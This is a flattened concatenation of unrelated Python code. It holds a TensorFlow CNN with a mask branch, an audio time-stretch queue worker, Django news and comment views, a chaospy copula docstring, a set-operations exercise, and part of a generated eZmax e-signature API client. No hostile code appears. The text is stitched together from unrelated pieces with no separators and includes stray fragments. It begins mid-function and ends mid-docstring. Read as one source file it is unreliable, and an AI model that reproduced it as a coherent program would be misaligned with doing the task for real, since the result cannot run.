weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): #net = layers.flatten(net, scope='flatten') #net = tf.contrib.layers.avg_pool2d(net, kernel_size=4, scope='avg_pool') net = tf.contrib.layers.max_pool2d(net, kernel_size=4, scope='avg_pool') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' maxpool out = ') net = layers.flatten(net, scope='flatten') net = layers.fully_connected(net, 256, scope='fc3') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' fc1 out = ') net = layers.fully_connected(net, 128, scope='fc4') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' fc2 out = ') logits = layers.fully_connected(net, num_classes, activation_fn=None, scope='logits') #logits = tf.Print(logits, [tf.reduce_sum(logits), tf.reduce_min(logits), tf.reduce_max(logits)], message='logits = ') return logits, mask, reg_loss def build(x, labels, num_classes, is_training, reuse=False): if reuse: tf.get_variable_scope().reuse_variables() #logits = _build(x, is_training) logits, mask, reg_loss = _build(x, num_classes, is_training) total_loss = loss(logits, labels, is_training) + reg_loss #all_vars = tf.contrib.framework.get_variables() #for v in all_vars: # print(v.name) return [total_loss, logits, mask] def build_old(inputs, labels, num_classes, is_training): weight_decay = 1e-4 # to big weight_decay = 5e-3 bn_params = { # Decay for the moving averages. 'decay': 0.999, 'center': True, 'scale': True, # epsilon to prevent 0s in variance. 
'epsilon': 0.001, # None to force the updates 'updates_collections': None, 'is_training': is_training, } conv1sz = 32 conv2sz = 64 #conv1sz = 32 #conv2sz = 64 with tf.contrib.framework.arg_scope([layers.convolution2d], kernel_size=3, stride=1, padding='SAME', rate=1, activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, #normalizer_fn=None, weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): net = layers.convolution2d(inputs, conv1sz, scope='conv1_1') net = layers.convolution2d(net, conv1sz, scope='conv1_2') #net = layers.convolution2d(inputs, conv1sz, scope='conv1_1') net = layers.max_pool2d(net, 2, 2, padding='SAME', scope='pool1') net = layers.convolution2d(net, conv2sz, scope='conv2_1') net = layers.convolution2d(net, conv2sz, scope='conv2_2') #net = layers.convolution2d(net, conv2sz, kernel_size=5, scope='conv2_2') net = layers.max_pool2d(net, 2, 2, padding='SAME', scope='pool2') #net = layers.convolution2d(net, conv2sz, padding='VALID', scope='conv3_1') #net = layers.convolution2d(net, conv2sz, kernel_size=1, scope='conv3_2') #net = layers.convolution2d(net, num_classes, kernel_size=1, scope='conv3_3') mask = layers.convolution2d(net, conv2sz, scope='conv1_mask') mask = layers.convolution2d(mask, 1, scope='conv2_mask') #mask = tf.sigmoid(mask) mask = tf.nn.relu(mask) print(mask) #l1_scale = 1e-4 l1_scale = 1e-3 #l1_scale = 1e-9 l1_regularizer = layers.l1_regularizer(l1_scale) l1_loss = l1_regularizer(mask) #l1_loss = 0 #mask = tf.Print(mask, [tf.reduce_sum(mask)], message='MASK=') ##net = layers.convolution2d(net, num_classes, kernel_size=1, normalizer_fn=None, ## activation_fn=None, scope='conv3_3',) #print(net.get_shape()) net = tf.mul(net, mask) net = tf.contrib.layers.avg_pool2d(net, kernel_size=7, scope='avg_pool') print(net) #logits = tf.reshape(logits, [-1, num_classes]) #print(logits.get_shape()) with tf.contrib.framework.arg_scope([layers.fully_connected], activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, #normalizer_fn=None, weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): net = layers.flatten(net, scope='flatten') #net = layers.fully_connected(net, 512, scope='fc3') #net = layers.fully_connected(net, 256, scope='fc4') net = layers.fully_connected(net, 256, scope='fc3') net = layers.fully_connected(net, 128, scope='fc4') logits = layers.fully_connected(net, num_classes, activation_fn=None, weights_regularizer=layers.l2_regularizer(weight_decay), scope='logits') loss = build_loss(logits, labels, num_classes) loss += l1_loss return [loss, logits, mask] import os import json import subprocess import beanstalkc from pydub import AudioSegment q = beanstalkc.Connection(host='localhost', port=14711) def stretch_it(job): """ creates a subprocess and calls paulstretch_stereo.py with the proper args. assumes filepath is correct. """ if job.body is not None: data = json.loads(job.body) # convert track to wav filename_chunk = os.path.splitext(data['filename']) converted_track = AudioSegment.from_file(data['filename'], filename_chunk[1][1:]) wav_name = '%s.wav' % filename_chunk[0] converted_track.export(wav_name, format='wav') finished_name = data['uniq_filename'] window = '--window=%f' % data['window'] stretch = '--stretch=%f' % data['stretch'] # Stretch it! 
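# The actual time-stretching is delegated to paulstretch_stereo.py in a child process; the
# --window and --stretch arguments are built above from the queued job's 'window' and 'stretch'
# fields, and the job is removed from the beanstalk queue once the call returns.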
subprocess.call(["python", "./utils/paulstretch_stereo.py", window, stretch, wav_name, finished_name]) job.delete() while True: item = q.reserve() stretch_it(item) tananyan/siteee1-10 from django.shortcuts import render from django.views.generic.edit import FormView from django.contrib.auth.forms import AuthenticationForm from django.http import HttpResponseRedirect from django.contrib.auth import login from NewsApp.models import Articles, Comments from NewsApp.forms import CommentForm # для вывода всех постов class postsView(FormView): form_class = AuthenticationForm # Аналогично регистрации, только используем шаблон аутентификации. template_name = "NewsApp/posts.html" # В случае успеха перенаправим на главную. success_url = "../news" def get(self, request): form1 = AuthenticationForm(request.POST) return render(request, 'NewsApp/posts.html', {'object_list': Articles.objects.all().order_by("-date")[:20], 'form': form1, 'user': request.user}) def form_valid(self, form): # Получаем объект пользователя на основе введённых в форму данных. self.user = form.get_user() # Выполняем аутентификацию пользователя. login(self.request, self.user) return super(postsView, self).form_valid(form) # Для вывода одного поста class postView(FormView): form_class = AuthenticationForm model = Articles # Аналогично регистрации, только используем шаблон аутентификации. template_name = "NewsApp/post.html" # В случае успеха перенаправим на главную. success_url = "/news/" def get(self, request, pk): form1 = AuthenticationForm(request.POST) a = dict(atr=self.model.objects.filter(id=pk)) b = {'form': form1} a.update(b) c = {'user': request.user} a.update(c) comments = Comments.objects.filter(comments_article=pk) d = {'commets': comments} a.update(d) form = {'form_comments': CommentForm} a.update(form) return render(request, 'NewsApp/post.html', a) def form_valid(self, form): # Получаем объект пользователя на основе введённых в форму данных. self.user = form.get_user() # Выполняем аутентификацию пользователя. login(self.request, self.user) return super(postView, self).form_valid(form) # Для добавления комментария def addcomment(request, article_id): if request.method == "POST": form = CommentForm(request.POST) if form.is_valid(): comment = form.save(commit=False) comment.comments_article = Articles.objects.get(id=article_id) comment.comments_author = request.user form.save() return HttpResponseRedirect('/news/%s' % article_id) return HttpResponseRedirect('/news/%s' % article_id) r""" Copulas are a type dependency structure imposed on independent variables to achieve to more complex problems without adding too much complexity. 
To construct a copula one needs a copula transformation and the Copula wrapper:: >>> dist = chaospy.Iid(chaospy.Uniform(), 2) >>> copula = chaospy.Gumbel(dist, theta=1.5) The resulting copula is then ready for use:: >>> copula.sample(5).round(4) array([[0.6536, 0.115 , 0.9503, 0.4822, 0.8725], [0.6286, 0.0654, 0.96 , 0.5073, 0.9705]]) """ from .archimedean import Archimedean from .gumbel import Gumbel from .clayton import Clayton from .joe import Joe from .nataf import Nataf from .t_copula import TCopula q = int(input()) for k in range(q): n = int(input()) conjuntos = [] for i in range(n): conjuntos.append(set(input().split()[1:])) m = int(input()) for j in range(m): a, b, c = map(int, input().split()) conj1 = conjuntos[b - 1] conj2 = conjuntos[c - 1] if a == 1: print(len(conj1.intersection(conj2))) else: print(len(conj1.union(conj2))) 0 """ eZmax API Definition This API expose all the functionnalities for the eZmax and eZsign applications. # noqa: E501 The version of the OpenAPI document: 1.1.3 Contact: Generated by: https://openapi-generator.tech """ import re # noqa: F401 import sys # noqa: F401 from eZmaxApi.api_client import ApiClient, Endpoint as _Endpoint from eZmaxApi.model_utils import ( # noqa: F401 check_allowed_values, check_validations, date, datetime, file_type, none_type, validate_and_convert_types ) from eZmaxApi.model.common_response_error import CommonResponseError from eZmaxApi.model.ezsignfolder_create_object_v1_request import EzsignfolderCreateObjectV1Request from eZmaxApi.model.ezsignfolder_create_object_v1_response import EzsignfolderCreateObjectV1Response from eZmaxApi.model.ezsignfolder_delete_object_v1_response import EzsignfolderDeleteObjectV1Response from eZmaxApi.model.ezsignfolder_get_forms_data_v1_response import EzsignfolderGetFormsDataV1Response from eZmaxApi.model.ezsignfolder_get_list_v1_response import EzsignfolderGetListV1Response from eZmaxApi.model.ezsignfolder_get_object_v1_response import EzsignfolderGetObjectV1Response from eZmaxApi.model.ezsignfolder_send_v1_request import EzsignfolderSendV1Request from eZmaxApi.model.ezsignfolder_send_v1_response import EzsignfolderSendV1Response from eZmaxApi.model.ezsignfolder_unsend_v1_response import EzsignfolderUnsendV1Response from eZmaxApi.model.header_accept_language import HeaderAcceptLanguage class ObjectEzsignfolderApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. 
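A usage sketch (the client configuration is application-specific and illustrative only): api = ObjectEzsignfolderApi(api_client), then for example response = api.ezsignfolder_get_list_v1(e_order_by='pkiEzsignfolderID_ASC', i_row_max=25). Each public method below simply packs its arguments and delegates to the matching _Endpoint.call_with_http_info().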
""" def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client self.ezsignfolder_create_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderCreateObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder', 'operation_id': 'ezsignfolder_create_object_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'ezsignfolder_create_object_v1_request', ], 'required': [ 'ezsignfolder_create_object_v1_request', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'ezsignfolder_create_object_v1_request': ([EzsignfolderCreateObjectV1Request],), }, 'attribute_map': { }, 'location_map': { 'ezsignfolder_create_object_v1_request': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) self.ezsignfolder_delete_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderDeleteObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}', 'operation_id': 'ezsignfolder_delete_object_v1', 'http_method': 'DELETE', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_children_v1_endpoint = _Endpoint( settings={ 'response_type': None, 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/getChildren', 'operation_id': 'ezsignfolder_get_children_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_forms_data_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetFormsDataV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/getFormsData', 'operation_id': 'ezsignfolder_get_forms_data_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json', 'application/zip' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_list_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetListV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': 
'/1/object/ezsignfolder/getList', 'operation_id': 'ezsignfolder_get_list_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'e_order_by', 'i_row_max', 'i_row_offset', 'accept_language', 's_filter', ], 'required': [], 'nullable': [ ], 'enum': [ 'e_order_by', ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { ('e_order_by',): { "PKIEZSIGNFOLDERID_ASC": "pkiEzsignfolderID_ASC", "PKIEZSIGNFOLDERID_DESC": "pkiEzsignfolderID_DESC", "SEZSIGNFOLDERDESCRIPTION_ASC": "sEzsignfolderDescription_ASC", "SEZSIGNFOLDERDESCRIPTION_DESC": "sEzsignfolderDescription_DESC", "DTCREATEDDATE_ASC": "dtCreatedDate_ASC", "DTCREATEDDATE_DESC": "dtCreatedDate_DESC", "FKIEZSIGNFOLDERTYPEID_ASC": "fkiEzsignfoldertypeID_ASC", "FKIEZSIGNFOLDERTYPEID_DESC": "fkiEzsignfoldertypeID_DESC", "SEZSIGNFOLDERTYPENAMEX_ASC": "sEzsignfoldertypeNameX_ASC", "SEZSIGNFOLDERTYPENAMEX_DESC": "sEzsignfoldertypeNameX_DESC", "EEZSIGNFOLDERSTEP_ASC": "eEzsignfolderStep_ASC", "EEZSIGNFOLDERSTEP_DESC": "eEzsignfolderStep_DESC", "DTEZSIGNFOLDERSENTDATE_ASC": "dtEzsignfolderSentdate_ASC", "DTEZSIGNFOLDERSENTDATE_DESC": "dtEzsignfolderSentdate_DESC", "DTDUEDATE_ASC": "dtDueDate_ASC", "DTDUEDATE_DESC": "dtDueDate_DESC", "ITOTALDOCUMENT_ASC": "iTotalDocument_ASC", "ITOTALDOCUMENT_DESC": "iTotalDocument_DESC", "ITOTALDOCUMENTEDM_ASC": "iTotalDocumentEdm_ASC", "ITOTALDOCUMENTEDM_DESC": "iTotalDocumentEdm_DESC", "ITOTALSIGNATURE_ASC": "iTotalSignature_ASC", "ITOTALSIGNATURE_DESC": "iTotalSignature_DESC", "ITOTALSIGNATURESIGNED_ASC": "iTotalSignatureSigned_ASC", "ITOTALSIGNATURESIGNED_DESC": "iTotalSignatureSigned_DESC" }, }, 'openapi_types': { 'e_order_by': (str,), 'i_row_max': (int,), 'i_row_offset': (int,), 'accept_language': (HeaderAcceptLanguage,), 's_filter': (str,), }, 'attribute_map': { 'e_order_by': 'eOrderBy', 'i_row_max': 'iRowMax', 'i_row_offset': 'iRowOffset', 'accept_language': 'Accept-Language', 's_filter': 'sFilter', }, 'location_map': { 'e_order_by': 'query', 'i_row_max': 'query', 'i_row_offset': 'query', 'accept_language': 'header', 's_filter': 'query', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}', 'operation_id': 'ezsignfolder_get_object_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_send_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderSendV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/send', 'operation_id': 'ezsignfolder_send_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', 'ezsignfolder_send_v1_request', ], 'required': [ 'pki_ezsignfolder_id', 'ezsignfolder_send_v1_request', ], 'nullable': [ ], 'enum': [ ], 
'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), 'ezsignfolder_send_v1_request': (EzsignfolderSendV1Request,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', 'ezsignfolder_send_v1_request': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) self.ezsignfolder_unsend_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderUnsendV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/unsend', 'operation_id': 'ezsignfolder_unsend_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', 'body', ], 'required': [ 'pki_ezsignfolder_id', 'body', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), 'body': (str,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', 'body': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) def ezsignfolder_create_object_v1( self, ezsignfolder_create_object_v1_request, **kwargs ): """Create a new Ezsignfolder # noqa: E501 The endpoint allows to create one or many elements at once. The array can contain simple (Just the object) or compound (The object and its child) objects. Creating compound elements allows to reduce the multiple requests to create all child objects. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_create_object_v1(ezsignfolder_create_object_v1_request, async_req=True) >>> result = thread.get() Args: ezsignfolder_create_object_v1_request ([EzsignfolderCreateObjectV1Request]): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderCreateObjectV1Response If the method is called asynchronously, returns the request thread. 
""" kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['ezsignfolder_create_object_v1_request'] = \ ezsignfolder_create_object_v1_request return self.ezsignfolder_create_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_delete_object_v1( self, pki_ezsignfolder_id, **kwargs ): """Delete an existing Ezsignfolder # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_delete_object_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderDeleteObjectV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_delete_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_children_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder's children IDs # noqa: E501 ## ⚠️EARLY ADOPTERS WARNING ### This endpoint is not officially released. Its definition might still change and it might not be available in every environment and region. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_children_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. 
Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: None If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_children_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_forms_data_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder's forms data # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_forms_data_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetFormsDataV1Response If the method is called asynchronously, returns the request thread. 
""" kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_forms_data_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_list_v1( self, **kwargs ): """Retrieve Ezsignfolder list # noqa: E501 Enum values that can be filtered in query parameter *sFilter*: | Variable | Valid values | |---|---| | eEzsignfolderStep | Unsent
Sent, PartiallySigned, Expired, Completed, Archived | | eEzsignfoldertypePrivacylevel | User,
Usergroup | # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_list_v1(async_req=True) >>> result = thread.get() Keyword Args: e_order_by (str): Specify how you want the results to be sorted. [optional] i_row_max (int): [optional] i_row_offset (int): [optional] accept_language (HeaderAcceptLanguage): [optional] s_filter (str): [optional] _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetListV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') return self.ezsignfolder_get_list_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_object_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder # noqa: E501 ## ⚠️EARLY ADOPTERS WARNING ### This endpoint is not officially released. Its definition might still change and it might not be available in every environment and region. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_object_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. 
Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderGetObjectV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_send_v1( self, pki_ezsignfolder_id, ezsignfolder_send_v1_request, **kwargs ): """Send the Ezsignfolder to the signatories for signature # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_send_v1(pki_ezsignfolder_id, ezsignfolder_send_v1_request, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): ezsignfolder_send_v1_request (EzsignfolderSendV1Request): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: 